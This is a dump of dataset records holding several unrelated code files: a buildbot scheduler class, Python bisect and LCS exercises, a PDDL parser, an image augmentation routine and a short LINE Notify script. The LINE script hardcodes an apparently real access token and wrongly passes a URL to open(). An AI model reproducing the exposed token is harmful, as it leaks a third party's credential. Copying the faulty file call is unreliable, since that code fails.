"call"}, {"api_name": "torch.autograd.Variable", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 40, "usage_type": "attribute"}, {"api_name": "data_utils.read_data", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 85, "usage_type": "attribute"}, {"api_name": "torch.max", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 106, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 116, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 116, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 124, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 157, "usage_type": "attribute"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 160, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 160, "usage_type": "name"}, {"api_name": "torch.save", "line_number": 169, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 172, "usage_type": "call"}]} +{"seq_id": "13056058856", "text": "from buildbot import config\nfrom buildbot import interfaces\nfrom buildbot.process.properties import Properties\nfrom buildbot.util import ComparableMixin\nfrom buildbot.util.state import StateMixin\nfrom twisted.application import service\nfrom twisted.internet import defer\nfrom twisted.python import failure\nfrom twisted.python import log\nfrom zope.interface import implements\n\n\nclass BaseScheduler(service.MultiService, ComparableMixin, StateMixin):\n\n \"\"\"\n Base class for all schedulers; this provides the equipment to manage\n reconfigurations and to handle basic scheduler state. 
It also provides\n utility methods to begin various sorts of builds.\n\n Subclasses should add any configuration-derived attributes to\n C{base.Scheduler.compare_attrs}.\n \"\"\"\n\n implements(interfaces.IScheduler)\n\n DefaultCodebases = {'': {}}\n\n compare_attrs = ('name', 'builderNames', 'properties', 'codebases')\n\n def __init__(self, name, builderNames, properties,\n codebases=DefaultCodebases):\n \"\"\"\n Initialize a Scheduler.\n\n @param name: name of this scheduler (used as a key for state)\n @type name: unicode\n\n @param builderNames: list of builders this scheduler may start\n @type builderNames: list of unicode\n\n @param properties: properties to add to builds triggered by this\n scheduler\n @type properties: dictionary\n\n @param codebases: codebases that are necessary to process the changes\n @type codebases: dict with following struct:\n key: ''\n value: {'repository':'', 'branch':'
    ', 'revision:''}\n\n @param consumeChanges: true if this scheduler wishes to be informed\n about the addition of new changes. Defaults to False. This should\n be passed explicitly from subclasses to indicate their interest in\n consuming changes.\n @type consumeChanges: boolean\n \"\"\"\n service.MultiService.__init__(self)\n self.name = name\n \"name of this scheduler; used to identify replacements on reconfig\"\n\n ok = True\n if not isinstance(builderNames, (list, tuple)):\n ok = False\n else:\n for b in builderNames:\n if not isinstance(b, basestring):\n ok = False\n if not ok:\n config.error(\n \"The builderNames argument to a scheduler must be a list \"\n \"of Builder names.\")\n\n self.builderNames = builderNames\n \"list of builder names to start in each buildset\"\n\n self.properties = Properties()\n \"properties that are contributed to each buildset\"\n self.properties.update(properties, \"Scheduler\")\n self.properties.setProperty(\"scheduler\", name, \"Scheduler\")\n\n self.objectid = None\n\n self.master = None\n\n # Set the codebases that are necessary to process the changes\n # These codebases will always result in a sourcestamp with or without changes\n if codebases is not None:\n if not isinstance(codebases, dict):\n config.error(\"Codebases must be a dict of dicts\")\n for codebase, codebase_attrs in codebases.iteritems():\n if not isinstance(codebase_attrs, dict):\n config.error(\"Codebases must be a dict of dicts\")\n if (codebases != BaseScheduler.DefaultCodebases and\n 'repository' not in codebase_attrs):\n config.error(\"The key 'repository' is mandatory in codebases\")\n else:\n config.error(\"Codebases cannot be None\")\n\n self.codebases = codebases\n\n # internal variables\n self._change_subscription = None\n self._change_consumption_lock = defer.DeferredLock()\n\n # service handling\n\n def startService(self):\n service.MultiService.startService(self)\n\n def findNewSchedulerInstance(self, new_config):\n return new_config.schedulers[self.name] # should exist!\n\n def stopService(self):\n d = defer.maybeDeferred(self._stopConsumingChanges)\n d.addCallback(lambda _: service.MultiService.stopService(self))\n return d\n\n # status queries\n # TODO: these aren't compatible with distributed schedulers\n def listBuilderNames(self):\n \"Returns the list of builder names\"\n return self.builderNames\n\n def getPendingBuildTimes(self):\n \"Returns a list of the next times that builds are scheduled, if known.\"\n return []\n\n # change handling\n\n def startConsumingChanges(self, fileIsImportant=None, change_filter=None,\n onlyImportant=False):\n \"\"\"\n Subclasses should call this method from startService to register to\n receive changes. The BaseScheduler class will take care of filtering\n the changes (using change_filter) and (if fileIsImportant is not None)\n classifying them. See L{gotChange}. 
Returns a Deferred.\n\n @param fileIsImportant: a callable provided by the user to distinguish\n important and unimportant changes\n @type fileIsImportant: callable\n\n @param change_filter: a filter to determine which changes are even\n considered by this scheduler, or C{None} to consider all changes\n @type change_filter: L{buildbot.changes.filter.ChangeFilter} instance\n\n @param onlyImportant: If True, only important changes, as specified by\n fileIsImportant, will be added to the buildset.\n @type onlyImportant: boolean\n\n \"\"\"\n assert fileIsImportant is None or callable(fileIsImportant)\n\n # register for changes with master\n assert not self._change_subscription\n\n def changeCallback(change):\n # ignore changes delivered while we're not running\n if not self._change_subscription:\n return\n\n if change_filter and not change_filter.filter_change(change):\n return\n if change.codebase not in self.codebases:\n log.msg(format='change contains codebase %(codebase)s that is '\n 'not processed by scheduler %(name)s',\n codebase=change.codebase, name=self.name)\n return\n if fileIsImportant:\n try:\n important = fileIsImportant(change)\n if not important and onlyImportant:\n return\n except:\n log.err(failure.Failure(),\n 'in fileIsImportant check for %s' % change)\n return\n else:\n important = True\n\n # use change_consumption_lock to ensure the service does not stop\n # while this change is being processed\n d = self._change_consumption_lock.run(self.gotChange, change, important)\n d.addErrback(log.err, 'while processing change')\n self._change_subscription = self.master.subscribeToChanges(changeCallback)\n\n return defer.succeed(None)\n\n def _stopConsumingChanges(self):\n # (note: called automatically in stopService)\n\n # acquire the lock change consumption lock to ensure that any change\n # consumption is complete before we are done stopping consumption\n def stop():\n if self._change_subscription:\n self._change_subscription.unsubscribe()\n self._change_subscription = None\n return self._change_consumption_lock.run(stop)\n\n def gotChange(self, change, important):\n \"\"\"\n Called when a change is received; returns a Deferred. If the\n C{fileIsImportant} parameter to C{startConsumingChanges} was C{None},\n then all changes are considered important.\n The C{codebase} of the change has always an entry in the C{codebases}\n dictionary of the scheduler.\n\n @param change: the new change object\n @type change: L{buildbot.changes.changes.Change} instance\n @param important: true if this is an important change, according to\n C{fileIsImportant}.\n @type important: boolean\n @returns: Deferred\n \"\"\"\n raise NotImplementedError\n\n # starting builds\n\n @defer.inlineCallbacks\n def addBuildsetForLatest(self, reason='', external_idstring=None,\n branch=None, repository='', project='',\n builderNames=None, properties=None):\n \"\"\"\n Add a buildset for the 'latest' source in the given branch,\n repository, and project. 
This will create a relative sourcestamp for\n the buildset.\n\n This method will add any properties provided to the scheduler\n constructor to the buildset, and will call the master's addBuildset\n method with the appropriate parameters.\n\n @param reason: reason for this buildset\n @type reason: unicode string\n @param external_idstring: external identifier for this buildset, or None\n @param branch: branch to build (note that None often has a special meaning)\n @param repository: repository name for sourcestamp\n @param project: project name for sourcestamp\n @param builderNames: builders to name in the buildset (defaults to\n C{self.builderNames})\n @param properties: a properties object containing initial properties for\n the buildset\n @type properties: L{buildbot.process.properties.Properties}\n @returns: (buildset ID, buildrequest IDs) via Deferred\n \"\"\"\n # Define setid for this set of changed repositories\n setid = yield self.master.db.sourcestampsets.addSourceStampSet()\n\n # add a sourcestamp for each codebase\n for codebase, cb_info in self.codebases.iteritems():\n ss_repository = cb_info.get('repository', repository)\n ss_branch = cb_info.get('branch', branch)\n ss_revision = cb_info.get('revision', None)\n yield self.master.db.sourcestamps.addSourceStamp(\n codebase=codebase,\n repository=ss_repository,\n branch=ss_branch,\n revision=ss_revision,\n project=project,\n changeids=set(),\n sourcestampsetid=setid)\n\n bsid, brids = yield self.addBuildsetForSourceStamp(\n setid=setid, reason=reason,\n external_idstring=external_idstring,\n builderNames=builderNames,\n properties=properties)\n\n defer.returnValue((bsid, brids))\n\n @defer.inlineCallbacks\n def addBuildsetForSourceStampDetails(self, reason='', external_idstring=None,\n branch=None, repository='', project='', revision=None,\n builderNames=None, properties=None):\n \"\"\"\n Given details about the source code to build, create a source stamp and\n then add a buildset for it.\n\n @param reason: reason for this buildset\n @type reason: unicode string\n @param external_idstring: external identifier for this buildset, or None\n @param branch: branch to build (note that None often has a special meaning)\n @param repository: repository name for sourcestamp\n @param project: project name for sourcestamp\n @param revision: revision to build - default is latest\n @param builderNames: builders to name in the buildset (defaults to\n C{self.builderNames})\n @param properties: a properties object containing initial properties for\n the buildset\n @type properties: L{buildbot.process.properties.Properties}\n @returns: (buildset ID, buildrequest IDs) via Deferred\n \"\"\"\n # Define setid for this set of changed repositories\n setid = yield self.master.db.sourcestampsets.addSourceStampSet()\n\n yield self.master.db.sourcestamps.addSourceStamp(\n branch=branch, revision=revision, repository=repository,\n project=project, sourcestampsetid=setid)\n\n rv = yield self.addBuildsetForSourceStamp(\n setid=setid, reason=reason,\n external_idstring=external_idstring,\n builderNames=builderNames,\n properties=properties)\n defer.returnValue(rv)\n\n @defer.inlineCallbacks\n def addBuildsetForSourceStampSetDetails(self, reason, sourcestamps,\n properties, builderNames=None):\n if sourcestamps is None:\n sourcestamps = {}\n\n # Define new setid for this set of sourcestamps\n new_setid = yield self.master.db.sourcestampsets.addSourceStampSet()\n\n # Merge codebases with the passed list of sourcestamps\n # This results in a new sourcestamp for 
each codebase\n for codebase in self.codebases:\n ss = self.codebases[codebase].copy()\n # apply info from passed sourcestamps onto the configured default\n # sourcestamp attributes for this codebase.\n ss.update(sourcestamps.get(codebase, {}))\n\n # add sourcestamp to the new setid\n yield self.master.db.sourcestamps.addSourceStamp(\n codebase=codebase,\n repository=ss.get('repository', ''),\n branch=ss.get('branch', None),\n revision=ss.get('revision', None),\n project=ss.get('project', ''),\n changeids=[c['number'] for c in ss.get('changes', [])],\n patch_body=ss.get('patch_body', None),\n patch_level=ss.get('patch_level', None),\n patch_author=ss.get('patch_author', None),\n patch_comment=ss.get('patch_comment', None),\n sourcestampsetid=new_setid)\n\n rv = yield self.addBuildsetForSourceStamp(\n setid=new_setid, reason=reason,\n properties=properties,\n builderNames=builderNames)\n\n defer.returnValue(rv)\n\n def getCodebaseDict(self, codebase):\n # Hook for subclasses to change codebase parameters when a codebase does\n # not have a change associated with it.\n return self.codebases[codebase]\n\n @defer.inlineCallbacks\n def addBuildsetForChanges(self, reason='', external_idstring=None,\n changeids=[], builderNames=None, properties=None):\n changesByCodebase = {}\n\n def get_last_change_for_codebase(codebase):\n return max(changesByCodebase[codebase], key=lambda change: change[\"changeid\"])\n\n # Define setid for this set of changed repositories\n setid = yield self.master.db.sourcestampsets.addSourceStampSet()\n\n # Changes are retrieved from database and grouped by their codebase\n for changeid in changeids:\n chdict = yield self.master.db.changes.getChange(changeid)\n # group change by codebase\n changesByCodebase.setdefault(chdict[\"codebase\"], []).append(chdict)\n\n for codebase in self.codebases:\n args = {'codebase': codebase, 'sourcestampsetid': setid}\n if codebase not in changesByCodebase:\n # codebase has no changes\n # create a sourcestamp that has no changes\n cb = self.getCodebaseDict(codebase)\n args['repository'] = cb['repository']\n args['branch'] = cb.get('branch', None)\n args['revision'] = cb.get('revision', None)\n args['changeids'] = set()\n args['project'] = ''\n else:\n # codebase has changes\n args['changeids'] = [c[\"changeid\"] for c in changesByCodebase[codebase]]\n lastChange = get_last_change_for_codebase(codebase)\n for key in ['repository', 'branch', 'revision', 'project']:\n args[key] = lastChange[key]\n\n yield self.master.db.sourcestamps.addSourceStamp(**args)\n\n # add one buildset, this buildset is connected to the sourcestamps by the setid\n bsid, brids = yield self.addBuildsetForSourceStamp(setid=setid,\n reason=reason, external_idstring=external_idstring,\n builderNames=builderNames, properties=properties)\n\n defer.returnValue((bsid, brids))\n\n @defer.inlineCallbacks\n def addBuildsetForSourceStamp(self, ssid=None, setid=None, reason='', external_idstring=None,\n properties=None, builderNames=None):\n \"\"\"\n Add a buildset for the given, already-existing sourcestamp.\n\n This method will add any properties provided to the scheduler\n constructor to the buildset, and will call the master's\n L{BuildMaster.addBuildset} method with the appropriate parameters, and\n return the same result.\n\n @param reason: reason for this buildset\n @type reason: unicode string\n @param external_idstring: external identifier for this buildset, or None\n @param properties: a properties object containing initial properties for\n the buildset\n @type 
properties: L{buildbot.process.properties.Properties}\n        @param builderNames: builders to name in the buildset (defaults to\n            C{self.builderNames})\n        @param setid: identification of a set of sourcestamps\n        @returns: (buildset ID, buildrequest IDs) via Deferred\n        \"\"\"\n        assert (ssid is None and setid is not None) \\\n            or (ssid is not None and setid is None), \"pass a single sourcestamp OR set not both\"\n\n        # combine properties\n        if properties:\n            properties.updateFromProperties(self.properties)\n        else:\n            properties = self.properties\n\n        # apply the default builderNames\n        if not builderNames:\n            builderNames = self.builderNames\n\n        # translate properties object into a dict as required by the\n        # addBuildset method\n        properties_dict = properties.asDict()\n\n        if setid is None:\n            if ssid is not None:\n                ssdict = yield self.master.db.sourcestamps.getSourceStamp(ssid)\n                setid = ssdict['sourcestampsetid']\n            else:\n                # no sourcestamp and no sets\n                yield None\n\n        rv = yield self.master.addBuildset(sourcestampsetid=setid,\n            reason=reason, properties=properties_dict,\n            builderNames=builderNames,\n            external_idstring=external_idstring)\n        defer.returnValue(rv)\n", "repo_name": "jollyroger/debian-buildbot", "sub_path": "buildbot/schedulers/base.py", "file_name": "base.py", "file_ext": "py", "file_size_in_byte": 18731, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "52", "api": [{"api_name": "twisted.application.service.MultiService", "line_number": 13, "usage_type": "attribute"}, {"api_name": "twisted.application.service", "line_number": 13, "usage_type": "name"}, {"api_name": "buildbot.util.ComparableMixin", "line_number": 13, "usage_type": "name"}, {"api_name": "buildbot.util.state.StateMixin", "line_number": 13, "usage_type": "name"}, {"api_name": "zope.interface.implements", "line_number": 24, "usage_type": "call"}, {"api_name": "buildbot.interfaces.IScheduler", "line_number": 24, "usage_type": "attribute"}, {"api_name": "buildbot.interfaces", "line_number": 24, "usage_type": "name"}, {"api_name": "twisted.application.service.MultiService.__init__", "line_number": 56, "usage_type": "call"}, {"api_name": "twisted.application.service.MultiService", "line_number": 56, "usage_type": "attribute"}, {"api_name": "twisted.application.service", "line_number": 56, "usage_type": "name"}, {"api_name": "buildbot.config.error", "line_number": 68, "usage_type": "call"}, {"api_name": "buildbot.config", "line_number": 68, "usage_type": "name"}, {"api_name": "buildbot.process.properties.Properties", "line_number": 75, "usage_type": "call"}, {"api_name": "buildbot.config.error", "line_number": 88, "usage_type": "call"}, {"api_name": "buildbot.config", "line_number": 88, "usage_type": "name"}, {"api_name": "buildbot.config.error", "line_number": 91, "usage_type": "call"}, {"api_name": "buildbot.config", "line_number": 91, "usage_type": "name"}, {"api_name": "buildbot.config.error", "line_number": 94, "usage_type": "call"}, {"api_name": "buildbot.config", "line_number": 94, "usage_type": "name"}, {"api_name": "buildbot.config.error", "line_number": 96, "usage_type": "call"}, {"api_name": "buildbot.config", "line_number": 96, "usage_type": "name"}, {"api_name": "twisted.internet.defer.DeferredLock", "line_number": 102, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 102, "usage_type": "name"}, {"api_name": "twisted.application.service.MultiService.startService", "line_number": 107, "usage_type": "call"}, {"api_name": 
"twisted.application.service.MultiService", "line_number": 107, "usage_type": "attribute"}, {"api_name": "twisted.application.service", "line_number": 107, "usage_type": "name"}, {"api_name": "twisted.internet.defer.maybeDeferred", "line_number": 113, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 113, "usage_type": "name"}, {"api_name": "twisted.application.service.MultiService.stopService", "line_number": 114, "usage_type": "call"}, {"api_name": "twisted.application.service.MultiService", "line_number": 114, "usage_type": "attribute"}, {"api_name": "twisted.application.service", "line_number": 114, "usage_type": "name"}, {"api_name": "twisted.python.log.msg", "line_number": 163, "usage_type": "call"}, {"api_name": "twisted.python.log", "line_number": 163, "usage_type": "name"}, {"api_name": "twisted.python.log.err", "line_number": 173, "usage_type": "call"}, {"api_name": "twisted.python.log", "line_number": 173, "usage_type": "name"}, {"api_name": "twisted.python.failure.Failure", "line_number": 173, "usage_type": "call"}, {"api_name": "twisted.python.failure", "line_number": 173, "usage_type": "name"}, {"api_name": "twisted.python.log.err", "line_number": 182, "usage_type": "attribute"}, {"api_name": "twisted.python.log", "line_number": 182, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 185, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 185, "usage_type": "name"}, {"api_name": "twisted.internet.defer.returnValue", "line_number": 266, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 266, "usage_type": "name"}, {"api_name": "twisted.internet.defer.inlineCallbacks", "line_number": 217, "usage_type": "attribute"}, {"api_name": "twisted.internet.defer", "line_number": 217, "usage_type": "name"}, {"api_name": "twisted.internet.defer.returnValue", "line_number": 302, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 302, "usage_type": "name"}, {"api_name": "twisted.internet.defer.inlineCallbacks", "line_number": 268, "usage_type": "attribute"}, {"api_name": "twisted.internet.defer", "line_number": 268, "usage_type": "name"}, {"api_name": "twisted.internet.defer.returnValue", "line_number": 340, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 340, "usage_type": "name"}, {"api_name": "twisted.internet.defer.inlineCallbacks", "line_number": 304, "usage_type": "attribute"}, {"api_name": "twisted.internet.defer", "line_number": 304, "usage_type": "name"}, {"api_name": "twisted.internet.defer.returnValue", "line_number": 389, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 389, "usage_type": "name"}, {"api_name": "twisted.internet.defer.inlineCallbacks", "line_number": 347, "usage_type": "attribute"}, {"api_name": "twisted.internet.defer", "line_number": 347, "usage_type": "name"}, {"api_name": "twisted.internet.defer.returnValue", "line_number": 442, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 442, "usage_type": "name"}, {"api_name": "twisted.internet.defer.inlineCallbacks", "line_number": 391, "usage_type": "attribute"}, {"api_name": "twisted.internet.defer", "line_number": 391, "usage_type": "name"}]} +{"seq_id": "39404886021", "text": "import bisect\nimport random\nfrom typing import List\n\nSIZE = 15\n\nfruits = ['grape', 'raspberry', 'apple', 'banana', 'pineapple-pie']\nprint(sorted(fruits, key=len))\nfruits.sort()\nprint(fruits)\n\nprint('use bisect 
to perform table lookup')\n\n\ndef grade(score, breakpoints=[60, 70, 80, 90], grades='FDCBA'):\n    i = bisect.bisect(breakpoints, score)\n    return grades[i]\n\n\nprint([grade(score) for score in [33, 99, 77, 70, 89, 90, 100]])\n\n# use insort to maintain the order of sequence while inserting.\nprint('use bisect insort')\nrandom.seed(1729)\n\nalist: List[int] = []\nfor i in range(SIZE):\n    new = random.randrange(SIZE * 2)\n    bisect.insort(alist, new)\n    print('{:2d} ->'.format(new), alist)\n", "repo_name": "Ailrk-sArchives/trash", "sub_path": "ARCHIVE/python/fluent-python/sorts.py", "file_name": "sorts.py", "file_ext": "py", "file_size_in_byte": 692, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "bisect.bisect", "line_number": 16, "usage_type": "call"}, {"api_name": "random.seed", "line_number": 24, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 26, "usage_type": "name"}, {"api_name": "random.randrange", "line_number": 28, "usage_type": "call"}, {"api_name": "bisect.insort", "line_number": 29, "usage_type": "call"}]}
+{"seq_id": "16761305294", "text": "from functools import lru_cache\nstrx='abracadabra'\nstry='avadakedavra'\n@lru_cache(None)\ndef dp(i,j):\n    if i>=len(strx) or j>=len(stry):\n        return 0\n    if strx[i]==stry[j]:\n\n        return 1+dp(i+1,j+1)\n    else:\n        return max(dp(i+1,j),dp(i,j+1))\n\nprint(dp(0,0))\n\n#conversion into tabular form\ndp=[[0 for i in range(len(stry)+1)] for j in range(len(strx)+1)]\n\nfor i in range(1,len(strx)+1):\n    for j in range(1,len(stry)+1):\n        if strx[i-1]==stry[j-1]:\n            dp[i][j]=1+dp[i-1][j-1]\n        else:\n            dp[i][j]=max(dp[i-1][j],dp[i][j-1])\n\nprint(dp[-1][-1])\nprint(dp)\n#printing out the string\ni=len(strx)\nj=len(stry)\nresult=\"\"\n\nwhile i>0 and j>0:\n    if dp[i][j-1]==dp[i][j]:\n        j-=1\n    elif dp[i-1][j]==dp[i][j] :\n        i-=1\n    result+=strx[i-1]\n    i-=1\n    j-=1\nprint(result[::-1])\n\n", "repo_name": "jagdishwar/CP", "sub_path": "Atcoder_DP/longest common subsequence.py", "file_name": "longest common subsequence.py", "file_ext": "py", "file_size_in_byte": 850, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "functools.lru_cache", "line_number": 4, "usage_type": "call"}]}
+{"seq_id": "73480810406", "text": "\nimport requests\n\n# LINE Notify token\ntoken = 'kkpN8FrEG1wfMoDVc2NbuETr30MlfSs1rLnRh0vX3jR'\n# Message to send\nmessage = '這是test'\n# HTTP header parameters and payload\nheaders = { \"Authorization\": \"Bearer \" + token }\ndata = { 'message': message ,\n        'stickerPackageId': '11539', # sticker package ID\n        'stickerId': '52114118', # sticker ID\n         }\n# Send the POST request with requests\nrequests.post(\"https://notify-api.line.me/api/notify\",\n              headers = headers, data = data)\n\n# Image file to send\nimage = open('https://yabeline.tw/Stickers_Data.php?Number=1448326', 'rb')\nfiles = { 'imageFile': image }\n\n", "repo_name": "mengqi1998/pythonProject1", "sub_path": "test_0812.py", "file_name": "test_0812.py", "file_ext": "py", "file_size_in_byte": 622, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.post", "line_number": 15, "usage_type": "call"}]}
+{"seq_id": "43230716906", "text": "import argparse\nfrom pddl import Problem, Utils, Domain\nfrom compilation import HaslumCompilation\n\n\ndef verify_parens(domain_string):\n    count = 0\n    remaining_string = domain_string\n    while remaining_string.find('(') >= 0 or remaining_string.find(')') >= 0:\n        left_idx = 
remaining_string.find('(')\n right_idx = remaining_string.find(')')\n if right_idx > left_idx >= 0:\n split = left_idx\n count += 1\n else:\n split = right_idx\n count -= 1\n remaining_string = remaining_string[split + 1:]\n if count < 0:\n return False\n return count == 0\n\n\nif __name__ == '__main__':\n args = argparse.ArgumentParser(description='Process Domain and Problem Files.')\n args.add_argument('-d','--domain', type=str, help='The Domain File', default=r'../samples/aladdin-domain.pddl')\n args.add_argument('-p','--problem', type=str, help='The Problem File', default=r'../samples/aladdin-problem.pddl')\n arguments = args.parse_args()\n\n domain_string = ''\n prob_string = ''\n with open(arguments.domain) as domF:\n for line in domF:\n trimmed = line[:line.find(';')].strip()\n if trimmed:\n domain_string += trimmed + '\\n'\n verify_parens(domain_string)\n child, _ = Utils.find_child(domain_string)\n # print(child)\n\n with open(arguments.problem) as probF:\n for line in probF:\n trimmed = line[:line.find(';')].strip()\n if trimmed:\n prob_string += trimmed + '\\n'\n\n verify_parens(prob_string)\n problem_child, _ = Utils.find_child(prob_string)\n\n prob = Problem.Problem(problem_child)\n dom = Domain.Domain(child)\n\n # print(dom.string)\n # print(\"------------\")\n # for kid in dom.predicates:\n # print(\"<\" + kid.replace('\\n', ' | ') + \">\")\n # dom.print_actions()\n\n compilation = HaslumCompilation(dom, prob)\n\n print(compilation.compiled_domain().to_pddl())\n\n\n\n\n\n", "repo_name": "qed-lab/belief-intention-compilation", "sub_path": "intention_compiler/parsee.py", "file_name": "parsee.py", "file_ext": "py", "file_size_in_byte": 1978, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 25, "usage_type": "call"}, {"api_name": "pddl.Utils.find_child", "line_number": 38, "usage_type": "call"}, {"api_name": "pddl.Utils", "line_number": 38, "usage_type": "name"}, {"api_name": "pddl.Utils.find_child", "line_number": 48, "usage_type": "call"}, {"api_name": "pddl.Utils", "line_number": 48, "usage_type": "name"}, {"api_name": "pddl.Problem.Problem", "line_number": 50, "usage_type": "call"}, {"api_name": "pddl.Problem", "line_number": 50, "usage_type": "name"}, {"api_name": "pddl.Domain.Domain", "line_number": 51, "usage_type": "call"}, {"api_name": "pddl.Domain", "line_number": 51, "usage_type": "name"}, {"api_name": "compilation.HaslumCompilation", "line_number": 59, "usage_type": "call"}, {"api_name": "compilation.compiled_domain", "line_number": 61, "usage_type": "call"}]} +{"seq_id": "7433178844", "text": "import numpy as np\nfrom multiprocessing import Queue\n\nimport scipy\nimport scipy.ndimage\nimport cv2\n\ndef prepare_batches(y_edge, data, q):\n while True:\n angle = np.random.randint(-17, 17) \n batchx = scipy.ndimage.interpolation.rotate(data, angle, (1, 2), False, mode=\"constant\", cval=0)\n batchy = scipy.ndimage.interpolation.rotate(y_edge, angle, (1, 2), False, mode=\"constant\", cval=-1)\n \n batchx = np.clip(batchx, 0, 1)\n\n #batchx = np.concatenate([batchx, -batchx]) / 255.\n\n maxcrop = 40\n shape = batchx[0].shape\n \n final_x = []\n final_y = []\n for i in range(len(batchx)):\n \n while True:\n \n x1 = np.random.randint(0, maxcrop)\n x2 = np.random.randint(256 - maxcrop, 256)\n\n y1 = np.random.randint(0, maxcrop)\n y2 = np.random.randint(256 - maxcrop, 256)\n\n y_test = batchy[i, x1:x2, y1:y2]\n\n if not(np.any(y_test == -1)):\n break\n 
\n final_x.append(cv2.resize(batchx[i, x1:x2, y1:y2], (128, 128)))\n final_y.append(cv2.resize(batchy[i, x1:x2, y1:y2], (128, 128)))\n \n\n \n \n batchx = np.array(final_x)\n batchy = np.array(final_y)\n \n print(batchx.shape)\n print(batchy.shape)\n batchx = np.expand_dims(batchx, -1)\n\n batchy = np.expand_dims(batchy, -1)\n batchy = np.concatenate([batchy, 1-batchy], -1)\n \n batchx = np.concatenate([batchx, np.flip(batchx, 2)])\n batchy = np.concatenate([batchy, np.flip(batchy, 2)])\n \n #batchx = np.concatenate([batchx, np.flip(batchx, 1)])\n #batchy = np.concatenate([batchy, np.flip(batchy, 1)])\n \n #batchx = np.concatenate([batchx, np.transpose(batchx, (0, 2, 1, 3))])\n #batchy = np.concatenate([batchy, np.transpose(batchy, (0, 2, 1, 3))])\n \n #offset = np.random.random((len(batchx), 1, 1, 1)) / 4 - .125\n #scale = np.random.random((len(batchx), 1, 1, 1)) / 2 + .75\n \n #batchx = scale * batchx + offset\n \n scale = np.random.uniform(-1.4, 1.4, (len(batchx), 1, 1, 1))\n\n batchx = (batchx + 0.0) ** ( 2.5 **scale)\n q.put((batchx, batchy))", "repo_name": "SlicerIGT/aigt", "sub_path": "Notebooks/examples/augmentor.py", "file_name": "augmentor.py", "file_ext": "py", "file_size_in_byte": 2320, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 50, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.random.randint", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 10, "usage_type": "attribute"}, {"api_name": "scipy.ndimage.interpolation.rotate", "line_number": 11, "usage_type": "call"}, {"api_name": "scipy.ndimage", "line_number": 11, "usage_type": "attribute"}, {"api_name": "scipy.ndimage.interpolation.rotate", "line_number": 12, "usage_type": "call"}, {"api_name": "scipy.ndimage", "line_number": 12, "usage_type": "attribute"}, {"api_name": "numpy.clip", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 27, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 28, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 30, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 31, "usage_type": "attribute"}, {"api_name": "numpy.any", "line_number": 35, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 38, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 68, "usage_type": "attribute"}]} +{"seq_id": 
